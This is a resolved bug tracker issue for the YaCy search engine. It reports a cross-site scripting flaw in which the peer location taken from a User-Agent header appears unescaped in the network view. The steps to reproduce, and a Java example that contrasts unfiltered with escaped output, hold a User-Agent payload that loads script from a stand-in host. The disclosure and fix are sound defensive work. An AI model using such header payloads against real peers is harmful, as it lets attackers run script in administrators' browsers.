YaCy-Bugtracker

View Issue Details
ID: 0000204
Project: YaCy
Category: Wishlist - Wunschliste
View Status: public
Date Submitted: 2012-08-03 23:08
Last Update: 2012-08-15 14:24
Reporter: soultcer
Assigned To: Lotus
Priority: normal
Severity: minor
Reproducibility: have not tried
Status: resolved
Resolution: fixed
ETA: none
Platform:
OS:
OS Version:
Product Version: YaCy 1.0
Target Version:
Fixed in Version: YaCy 1.1
Summary: 0000204: XSS attack YaCy peers using modified User-Agent string

Description: YaCy extracts the "location" from the User-Agent string. This "location" is displayed without any filter in the network view.

Steps To Reproduce:
1) Modify rogue YaCy instance to report its own User-Agent as 'yacybot (freeworld/global; <script type="text/javascript" src="http://badsite.example/xss.js"></script>)'
2) Contact target peer with rogue YaCy instance.
3) Trick administrator of target peer to visit his network view.

Tags: No tags attached.
-  Notes
(0000413)
Lotus (developer)
2012-08-15 14:24

Fix in Commit ae9cd7a1182f853af45dc0a20b93bcdf462b97ca

- Issue History
Date Modified | Username | Field | Change
2012-08-03 23:08 | soultcer | New Issue |
2012-08-14 22:32 | administrator | View Status | private => public
2012-08-15 14:24 | Lotus | Note Added: 0000413 |
2012-08-15 14:24 | Lotus | Status | new => resolved
2012-08-15 14:24 | Lotus | Fixed in Version | => YaCy 1.1
2012-08-15 14:24 | Lotus | Resolution | open => fixed
2012-08-15 14:24 | Lotus | Assigned To | => Lotus
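
The flaw described in this issue, as an added example that is neither YaCy's code nor the fix from the commit named in the note: a remote peer's "location" is taken from its User-Agent header and written into an HTML table cell, first as-is and then HTML-encoded at the point of output. The class and method names, and the header layout (inferred from the sample string in the steps to reproduce), are assumptions.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class PeerLocationDemo {
    // Assumed layout, inferred from the sample string in the report:
    //   yacybot (<network>/<mode>; <location>)
    private static final Pattern UA = Pattern.compile("^yacybot \\(([^;]*);\\s*(.*)\\)\\s*$");

    /** Returns the raw, untrusted "location" field, or "" if the header does not match. */
    static String extractLocation(String userAgent) {
        if (userAgent == null) return "";
        Matcher m = UA.matcher(userAgent);
        return m.matches() ? m.group(2).trim() : "";
    }

    /** Encodes the characters that are significant in HTML text and attribute values. */
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Behaviour described in the report: the remote value reaches the page unchanged.
    static String renderCellUnfiltered(String userAgent) {
        return "<td>" + extractLocation(userAgent) + "</td>";
    }

    // Hardened form: the same value, encoded where it is written into HTML.
    static String renderCellEscaped(String userAgent) {
        return "<td>" + escapeHtml(extractLocation(userAgent)) + "</td>";
    }

    public static void main(String[] args) {
        // Constructed input, modelled on the string in "Steps To Reproduce".
        String ua = "yacybot (freeworld/global; <script type=\"text/javascript\" src=\"http://badsite.example/xss.js\"></script>)";
        System.out.println("unfiltered: " + renderCellUnfiltered(ua));
        System.out.println("escaped:    " + renderCellEscaped(ua));
    }
}
```

Encoding at output rather than rejecting at input keeps the stored peer data intact and protects every view that renders it through the escaped path.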

